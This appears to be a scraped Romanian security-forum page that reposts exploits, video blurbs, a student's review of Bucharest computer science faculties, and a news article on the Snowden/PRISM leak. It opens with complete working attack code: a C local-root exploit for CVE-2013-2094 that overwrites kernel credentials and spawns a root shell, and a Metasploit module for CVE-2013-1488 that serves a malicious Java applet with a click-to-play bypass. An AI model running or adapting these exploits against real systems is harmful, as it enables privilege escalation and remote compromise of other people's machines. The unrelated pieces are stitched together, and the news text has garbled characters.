[h=1]Linux kernel perf_swevent_init - Local root Exploit[/h] /* * CVE-2013-2094 exploit x86_64 Linux < 3.8.9 * by sorbo (sorbo@darkircop.org) June 2013 * * Based on sd's exploit. Supports more targets. * */ #define _GNU_SOURCE #include <string.h> #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <stdint.h> #include <sys/syscall.h> #include <sys/mman.h> #include <linux/perf_event.h> #include <signal.h> #include <assert.h> #define BASE 0x380000000 #define BASE_JUMP 0x1780000000 #define SIZE 0x10000000 #define KSIZE 0x2000000 #define TMP(x) (0xdeadbeef + (x)) struct idt { uint16_t limit; uint64_t addr; } __attribute__((packed)); static int _fd; static int perf_open(uint64_t off) { struct perf_event_attr attr; int rc; // printf("perf open %lx [%d]\n", off, (int) off); memset(&attr, 0, sizeof(attr)); attr.type = PERF_TYPE_SOFTWARE; attr.size = sizeof(attr); attr.config = off; attr.mmap = 1; attr.comm = 1; attr.exclude_kernel = 1; rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0); return rc; } void __sc_start(void); void __sc_next(void); void __sc(void) { asm("__sc_start:\n" "call __sc_next\n" "iretq\n" "__sc_next:\n"); } void sc(void) { int i, j; uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192)); uint64_t kbase = ((uint64_t)current) >> 36; int uid = TMP(1); int gid = TMP(2); for (i = 0; i < 4000; i += 4) { uint64_t *p = (void *) &current[i]; uint32_t *cred = (uint32_t*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j = 0; j < 20; j++) { if (cred[j] == uid && cred[j + 1] == gid) { for (i = 0; i < 8; i++) { cred[j + i] = 0; return; } } } } } static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val) { void *p; p = memmem(sc, 900, &needle, sizeof(needle)); if (!p) errx(1, "can't find %x", needle); memcpy(p, &val, sizeof(val)); } static void *map_mem(uint64_t addr) { void *p; p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); if (p == MAP_FAILED) err(1, "mmap()"); return p; } static int find_mem(void *mem, uint8_t c) { int i; uint8_t *p = mem; for (i = 0; i < SIZE; i++) { if (p[i] == c) return i; } return -1; } static void dropshell() { if (setuid(0) != 0) errx(1, "failed"); printf("Launching shell\n"); execl("/bin/sh", "sh", NULL); exit(0); } void morte(int x) { printf("Got signal\n"); close(_fd); dropshell(); } static void trigger(int intr) { switch (intr) { case 0: do { int z = 1; int a = 1; z--; a /= z; } while (0); break; case 4: asm("int $4"); break; case 0x80: asm("int $0x80"); break; default: errx(1, "unknown intr %d", intr); } sleep(3); } int main(int argc, char *argv[]) { uint32_t *p[2]; int fd, i; uint64_t off; uint64_t addr = BASE; struct idt idt; uint8_t *kbase; int sz = 4; int intr = 4; printf("Searchin...\n"); p[0] = map_mem(BASE); p[1] = map_mem(BASE_JUMP); memset(p[1], 0x69, SIZE); off = 0xFFFFFFFFL; fd = perf_open(off); close(fd); i = find_mem(p[0], 0xff); if (i == -1) { i = find_mem(p[1], 0x68); if (i == -1) errx(1, "Can't find overwrite"); sz = 24; addr = BASE_JUMP; printf("detected CONFIG_JUMP_LABEL\n"); } munmap(p[0], SIZE); munmap(p[1], SIZE); addr += i; addr -= off * sz; printf("perf_swevent_enabled is at 0x%lx\n", addr); asm("sidt %0" : "=m" (idt)); printf("IDT at 0x%lx\n", idt.addr); off = addr - idt.addr; off -= 8; switch (off % sz) { case 0: intr = 0; break; case 8: intr = 0x80; break; case 16: intr = 4; break; default: errx(1, "remainder %d", off % sz); } printf("Using interrupt %d\n", intr); off -= 16 * intr; assert((off % sz) == 0); off /= sz; off = -off; // printf("Offset %lx\n", off); kbase = (uint8_t*) (idt.addr & 0xFF000000); printf("Shellcode at %p\n", kbase); if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED) err(1, "mmap()"); memset(kbase, 0x90, KSIZE); kbase += KSIZE - 1024; i = __sc_next - __sc_start; memcpy(kbase, __sc_start, i); kbase += i; memcpy(kbase, sc, 900); sc_replace(kbase, TMP(1), getuid()); sc_replace(kbase, TMP(2), getgid()); signal(SIGALRM, morte); alarm(2); printf("Triggering sploit\n"); _fd = perf_open(off); trigger(intr); exit(0); } Sursa: Linux kernel perf_swevent_init - Local root Exploit

[h=1]Java Applet Driver Manager Privileged toString() Remote Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution', 'Description' => %q{ This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes, from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # Vulnerability discovery and Analysis 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-1488' ], [ 'OSVDB', '91472' ], [ 'BID', '58504' ], [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ], [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 10 2013' )) end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class") @driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class") @driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object") @object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver") @driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha("Exploit".length) @exploit_class.gsub!("Exploit", @exploit_class_name) @jnlp_name = rand_text_alpha(8) super end def jnlp_file jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp" jnlp = %Q| <?xml version="1.0" encoding="utf-8"?> <jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}"> <information> <title>Applet Test JNLP</title> <vendor>#{rand_text_alpha(8)}</vendor> <description>#{rand_text_alpha(8)}</description> <offline-allowed/> </information> <resources> <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" /> <jar href="#{rand_text_alpha(8)}.jar" main="true" /> </resources> <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1"> <param name="__applet_ssv_validated" value="true"></param> </applet-desc> <update check="background"/> </jnlp> | return jnlp end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jnlp$/i send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" }) when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("FakeDriver.class", @driver_class) jar.add_file("FakeDriver2.class", @driver2_class) jar.add_file("META-INF/services/java.lang.Object", @object_services) jar.add_file("META-INF/services/java.sql.Driver", @driver_services) metasploit_str = rand_text_alpha("metasploit".length) payload_str = rand_text_alpha("payload".length) jar.entries.each { |entry| entry.name.gsub!("metasploit", metasploit_str) entry.name.gsub!("Payload", payload_str) entry.data = entry.data.gsub("metasploit", metasploit_str) entry.data = entry.data.gsub("Payload", payload_str) } jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp" # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass html = %Q| <html> <body> <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0> <param name="app" value="#{jnlp_uri}"> <param name="back" value="true"> <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet> </object> </body> </html> | return html end end Sursa: Java Applet Driver Manager Privileged toString() Remote Code Execution

Burp Suite - Exploiting Lfi With Php://Input Wrapper Description: In this video you will learn how to exploit LFI vulnerability into Remote code execution. For Exploiting LFI vulnerability hood3y using Burp suite and executing a code in PHP://input. Sursa: Burp Suite - Exploiting Lfi With Php://Input Wrapper

Mona.Py : The Exploit Writer's Swiss Army Knife http://www.youtube.com/watch?v=D6dRlePXAhI&feature=player_embedded Description: Complete tutorial on Mona.py's usage. Kerala Cyber Force Ajin Abraham Sursa: Mona.Py : The Exploit Writer's Swiss Army Knife

Kali Linux - Create A Hidden Truecrypt Volume http://www.youtube.com/watch?v=I4vMM0M8vI0&feature=player_embedded Description: Five Simple Rules for Your Work Computer 1.) Don't Contaminate. 2.) BIOS and Bootloader Protection. 3.) Don't use Hibernate or Sleep. 3.) Use Full Disk Encryption. 4.) Use TrueCrypt - Hidden Container. 5.) Use Tails if you require privacy. Sursa: Kali Linux - Create A Hidden Truecrypt Volume

Sql Injection Conrad Reynolds Description: In this video Conrad Reynolds talk about Advanced SQL injection. He will target vulnerable os called Mutillidae and performing all the attack on it. This is very good presentation for beginners and advanced users. Sursa: Sql Injection Conrad Reynolds

Safeseh Bypass - Seh Buffer Overflow Win7- 64bits http://www.youtube.com/watch?v=2CGbejqG-QM&feature=player_embedded Description: In this video you will learn how to perform a SEH Buffer Overflow on Windows 7 64bit so In this video actually Mariotrey exploiting an IDM software (Internet Download Manager - SafeSEH Bypass). 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team Sursa: Safeseh Bypass - Seh Buffer Overflow Win7- 64bits

Tot vine bacul si lumea incearca sa decida la ce facultate sa ajunga, vreau sa aducem cateva lamuriri si sa speram ca vor face alegerea corecta. Vreau ca cei care sunt la diverse facultati de informatica sa isi descrie facultatea, cu bune si cu rele, sa nu faca si altii aceeasi greseala ca ei. Fiind in Bucuresti, trebuie sa spun ca sunt 4 facultati: 1. ASE - Cibernetica 2. Universitatea Bucuresti - Informatica 3. Politehnica Bucuresti - Automatica si calculatoare 4. Academia Tehnica Militara - ? Ordinea este practic in functie de gradul de dificultate: cel mai usor, lejer, ar fi la ASE, iar cel mai dificil, din punct de vedere al cursurilor, prezentelor cerute, numarului de ore dar si de ani, ar fi Politehnica. Vreau sa precizez si Academia Tehnica Militara, unde am dat si eu, am luat probele fizice (la MApN sunt grele iar la STS lejere) dar examenul scris este la matematica si fizica si este al dracu de nasol, mult mai nasol decat la Poli. Oricum sunt fericit ca nu am nimerit acolo, cunosc destule persoane care au plecat de acolo pentru ca "nu se merita", cand iesi din facultate semnezi contract pe 10 ani... In fine, daca exista persoane interesate, poate fi ok, va puteti interesa sau poate va pot raspunde la unele intrebari. Cum sunt student la Universitatea Bucuresti - Informatica, va voi spune in detaliu parerea mea despre aceasta facultate. Astept in special oameni de la Poli sa o descrie... Admiterea: Incepem cu inceputul. Cand am dat eu, si probabil si acum si peste 1000 de ani, admiterea consta intr-un examen scris astfel: 1. Subiect de informatica, o problema de programare (sau mai multe), mai degraba algoritmica, nu foarte dificila, care trebuia rezolvata (nu mai stiu daca in C/Pascal sau pseudocod) 2. Subiect de matematica, la alegere dintre: analiza, algebra si geometrie - PORCARIE! Media se calcula intre cele 2 subiecte. Nu stiu daca conta media de la bac sau alte porcarii, va interesati si voi. Eu am plecat pe ideea ca fac la cel de info, nu fac la cel de mate, dar media e ok. Si se intra usor: erau 180 de locuri, eu eram spre final (initial) cu media 7.50, cam asa, dar dupa redistribuiri (dupa ce isi retrag dosarul cei care au dat mai multe facultati si intra la o alta facultate) s-a intrat cu 5.01, adica a intrat cred ca toata lumea care a avut medie de trecere (trebuie sa luati minim 5). Aspectul facultatii: Poate sunt si persoane interesate de aceste aspecte stupide, dar care uneori conteaza, asa ca va spun pe scurt: nu e tocmai Hotel Intercontinental. Mai exact, bancile sunt de lemn, normale, 3 amfiteatre, la parter si la cele 3 etaje, cu proiector, majoritatea cursurilor fiind proiectate sau scrise pe tabla. Iarna e posibil sa aveti probleme cu frigul, nu prea am mai fost eu pe la facultate dar aveam colegi care stiu ca se plangeau ca iarna nu prea e caldura si ca stau cu gecile pe ei, dar nu cred ca e mereu asa. Laboratoare sunt cateva, calculatoarele sunt ok, nu va asteptati la cine stie ce, dar nici nu aveti nevoie, nu mergeti acolo sa va jucati, daca va merge Visual Studio nu aveti nevoie de mai mult. Recent a fost creat si un laborator cu 6 MAC-uri si 6 iPhone-uri pentru dezvoltarea de aplicatii, prin nu stiu ce afacere dubioasa cu firma unuia. Anul I - Semestrul I: - Analiza - MATEMATICA - Algebra - MATEMATICA - Logica matematica si computationala - MATEMATICA - Algoritmi si structuri de date - Se predau algoritmi de tot felul, sortari: bubble, interclasare, quick, mi se pare foarte util si ar trebui sa mergeti la el - Programare procedurala - Se preda limbajul C. Nu plecati de la ideea ca "eu stiu C" ca o sa va luati singur la palme cand o sa vedeti ca nu cunoasteti unele chestii de baza - Mergeti, e important! - Arhitectura sistemelor de calcul - Initial mi se paruse o prostie, dar e foarte interesant, e despre cum functioneaza un procesor, cum se implementeaza o adunare, o inmultire prin circuite, imi pare rau ca nu am prea fost. In plus, proful, Atanasiu, e genial. Sa nu mai pomenesc de laboratorul de Assemnbler... Anul I - Semestrul II: - Analiza II - MATEMATICA - Algebra II - MATEMATICA - Geometrie - MATEMATICA - Limbaje formale si automate - Nu prea va pot spune cu ce este aceasta materie, dar contine cateva lucruri interesante despre automate (deterministe, nedeterministe), gramatici si alte lucruri care veti vedea ca se folosesc la proiectarea compilatoarelor. Unele chestii interesante, poate fi util - Algoritmica grafurilor - Dupa cum spune si numele, algoritmi pe grafuri, poate fi util pentru tot felul de aplicatii de "maps", calculare de rute si mai stiu eu ce - Programare orientata pe obiecte - Poate cel mai important curs, cel putin pentru mine, se face C++ la un nivel mai "hardcore" cu toate detaliile de riguare. Examenul nu e usor (am luat cea mai mare nota din facultate la scris, la marire, sa ma laud ) Anul II - Semestrul I: - Probabilitati - MATEMATICA - Calculabilitate si complexitate - Poate parea sa aiba legatura cu complexitatea algoritmilor, cam despre asta e, dar nu stiu exact despre ce e vorba, mi s-a parut cam prea "matematic" (ca majoritatea cursurilor, o sa observati ca se face multa teorie si mai putina practica) - Geometrie computationala - Matematica, dar cu aplicatii in industria jocurilor, cred ca aveti nevoie de astfel de lucruri daca vreti sa faceti jocuri 3D. O singura notiune mi-a ramas in minte: Curbe Bezier. Dar tot multa matematica este - Tehnici Web - Se invata HTML, CSS si JavaScript, e util, nu e deloc greu, desi la examen s-ar putea sa vi se para ciudat sa puneti diverse lucruri sa se miste de colo-colo pe ecran - Sisteme de operare - Foarte smecher, Linux si in principal programarea in C sub Linux: semafoare, shared memory, foarte multe lucruri interesante, cel putin pentru mine - Tehnici avansate de programare - Se invata limbajul Java si algoritmica: greedy, backtracking... Lucruri pe care nu strica sa le cunosti Anul II - Semestrul II: - Statistica - MATEMATICA, dar profa e draguta, mergeti la cel putin un curs - Programare logica - AL DOILEA CEL MAI DE CACAT LUCRU DIN VIATA VOASTRA (vezi anul III). NU are nicio legatura cu "programarea". E o matematica nasoala, iar semene ciudate pe care le-ati invatat in liceu o sa fie mici copii pe langa porcariile de aici. Proful de cacat e CAZANESCU, daca aveti noroc poate faceti cu alta profa - Inteligenta artificiala - Numele spune totul, dar nu prea mi-a placut modul in care s-a predat, profa nu parea deloc interesata si nu atragea lumea. Se pot invata (cred) cateva lucruri utile. - Metode de dezvolare software - Nu prea venea lumea pe la cursuri, contine lucruri despre UML si alte astfel de lucruri, mi-a placut ca era un capitol despre threaduri (pthreads) si nu mai stiu ce mecanism de comunicatie inter-procese. - Baze de date - Baze de date Oracle, foarte util, notiuni avansate, query-uri lungi si frumoase - Retele de calculatoare - Nu se predau protocoale de comunicatie, TCP/IP, ci se face Java, dar se fac 3 chestii interesante: Sockets, RMI si Servlets. Anul III - Semestrul I: - Ecuatii diferentiale si derivate partiale - MATEMATICA, daca nu v-au placut integralele in liceu, o sa aveti viata grea, sunt chestii nasoale - Tehnici de simulare - Poate parea util, dar e o porcarie, tot MATEMATICA este - Programare declarativa - CEL MAI DE CACAT LUCRU DIN VIATA VOASTRA - Acelasi domn Cazanescu o sa aibe grija sa va faca viata un chin: pe langa faptul ca e un JEG de materie, ala cica nici nu vrea sa copiati, vezi domne vrea sa ii inveti, cand el trebuia sa se pensioneze de cativa ani - Dezvoltarea aplicatiilor web - Se face ASP.NET, mi s-a parut interesant si poate util - Sisteme de gestiune a bazelor de date - Se face Oracle PL/SQL, invatati notiuni interesante si utile: cursoare, triggeri, functii pentru baze de date Anul III - Semestrul II: - Calcul numeric - MATEMATICA, nu stiu exact care e logica sa dar profu e de treaba - Tehnici de optimizare - MATEMATICA, poate parea util, ca cica optimizezi, ca gasesti solutii, dar e vorba doar de reolvarea unor sisteme nasoale - Tehnici de compilare - Am invatat cate ceva si sunt cateva lucruri interesante: gramatici, transformarea unei expresii regulate intr-un automat, automate pushdown... Nu ar strica sa aruncati o privire - Criptografie si securitate - Numele spune tot, nu e nevoie sa va oblig sa mergeti la cursuri, nu sunt asa complicate si o sa invatati multe: AES, RSA... O sa para matematic, dar cel putin sunt lucruri extrem de interesante si utile! - Ingineria programarii - Nu stiu exact ce se preda, despre lucrul in echipa si alte astfel de lucruri, dar la "examen" se face un proiect in echipa, 5-6 persoane se e interesant, limbajul la alegere... Optionale: Dupa cum poate ati observat, in anul III sunt doar 5 materii in loc de 6. Pe langa aceste materii mai exista un "optional" care este de fapt obligatoriu, dar cel putin vi-l puteti alege. Nu stiu sa va zic toate optionalele, va zic doar sa NU alegeti "Algoritmi genetici" si sa faceti cererea de alegere, ca de nu, o sa va bage automat la o porcarie pe care nu o vrea nimeni (ca pe mine). Concluzie: Practic va recomand aceasta facultate daca: 1. nu va stresati cu materiile de matematica si copiati la examene 2. va duceti pe la cursurile "verzi" pentru ca nu aveti nimic de pierdut si o sa va prinda bine Astept si parerile voastre.

Modifica si tu exemplele de la final:IPC:Shared Memory

Superb!

misefalfaie , yo20063 - De acord. Aveti ban. O sa il scot cand "va invita cineva". Mai considera cineva ca accesul la informatii trebuie restrictionat?

[h=1]Scandalul scurgerii de informa?ii din SUA, semnalul unei amenin??ri la adresa libert??ilor individuale?[/h]Iulia Marin | 11/06/2013 Primele informa?ii cu privire la programul secret de supraveghere al Guvernului american au ap?rut miercuri. De atunci ?i pân? ast?zi, Edward Snowden, fostul angajat CIA care se afl? în spatele scurgerii de informa?ii, a devenit un personaj central, chiar unul de care depinde stabilitatea SUA în acest moment. Joi, “The Washington Post” ?i “The Guardian” au ar?tat c? NSA (Autoritatea Na?ional? de Supraveghere) a accesat serverele a nou? companii, printre care ?i Google, Microsoft sau Facebook, pentru a intercepta mesajele transmise în mediul online, cu ajutorul programului PRISM, dezvoltat, potrivit site-ului theatlantic.com, cu ajutorul unor firme private din Sillicon Valley. Toate companiile men?ionate neag? îns? implicarea în acest scandal. Informa?ia a provocat reac?ii de indignare în lumea întreag?, iar liderii Uniunii Europene au precizat deja c? a?teapt? explica?ii din partea administra?iei Obama. În acela?i timp, Casa Alb? a refuzat s? furnizeze date suplimentare, mai mul?i oficiali confirmând c? Snowden este deja subiectul unei investiga?ii. Edward Snowden, fostul angajat CIA, se afla în Hong Kong din 20 mai ?i se pare c? luni dup?-amiaz? ar fi p?r?sit hotelul unde era cazat, f?r? s? se mai afle nimic despre el. În interviul acordat cotidianului britanic “The Guardian”, Snowden a explicat c? obiectivul s?u a fost s? ac?ioneze în numele binelui comun ?i a insistat c? nu dore?te ca mass-media s? se concentreze doar asupra lui, tratând superficial informa?iile prezentate. Între timp, Barack Obama este supus unor presiuni serioase, fiind somat s? aib? o pozi?ie oficial? în acest sens, în contextul în care a negat în repetate rânduri faptul c? ar exista un astfel de program de supraveghere ?i a dat asigur?ri c? dreptul la via?a privat? este respectat. În Europa, cancelarul german Angela Merkel a insistat c? dore?te ca Obama s? ofere o serie de explica?ii referitoare la informa?iile furnizate de Snowden, în timp ce ?efa Comisiei Europene, Viviane Reding, a ad?ugat c? protejarea datelor fundamentale nu ar trebui s? fie un lux, ci un drept fundamental. Pe de alt? parte, într-un sondaj dat publicit??ii mar?i, realizat de Institutul Pew Research, se arat? c? peste 50% dintre americani consider? c? interceptarea conversa?iilor telefonice este “acceptabil?”. Rezultatul sondajului ar putea fi explicat prin prisma faptului c? tot mai mul?i cet??eni sunt însp?imânta?i de perspectiva unor atacuri teroriste, mai ales dup? atacurile din 11 septembrie 2001, dar chiar ?i dup? cele de la maratonul din Boston, care au avut loc anul acesta. De altfel, prevenirea atacurilor teroriste prin monitorizarea oric?rui tip de comunicare interpersonal? a fost ?i modul în care autorit??ile au justificat existen?a PRISM. În acela?i timp, mai multe cotidiene americane au ar?tat c? autorit??ile ar putea solicita extr?darea lui Snowden în Statele Unite, de teama ca oficialii chinezi s? nu afle mai multe informa?ii referitoare la programele de supraveghere. Dac? oficialii americani îl “vâneaz?”, îns?, cet??enii sunt de partea sa, cel pu?in asta se poate în?elege dintr-o peti?ie online prin care se cere absolvirea sa de orice vin? ?i care a fost semnat?, pân? la ora scrierii acestui articol, de c?tre 42.450 de persoane, în timp ce o alt? peti?ie îl “provoac?” pe Barack Obama s? ia parte la o dezbatere televizat? difuzat? în direct, în care s? discute problema chiar cu Edward Snowden. Dac? peti?ia care cere “iertarea” lui Snowden va strânge 100.000 de semn?turi pân? pe 9 iulie, va trebui ca solicitarea s? fie supus? aten?iei oficialilor de la Casa Alb?. În cele din urm?, întrebarea în jurul c?reia se construie?te întreaga dezbatere este dac? eventualele amenin??ri teroriste sunt o justificare pentru crearea unui stat de tip “Big Brother”, inspirat, parc?, din romanul lui George Orwell, “1984?: “Obiectul terorismului este chiar terorismul. Obiectul opresiunii este opresiunea. Obiectul torturii este tortura. Obiectul crimei este crima. Obiectul puterii este puterea. Acum începi s? în?elegi?” Sursa: Scandalul scurgerii de informa?ii din SUA, semnalul unei amenin??ri la adresa libert??ilor individuale? | eoficial.ro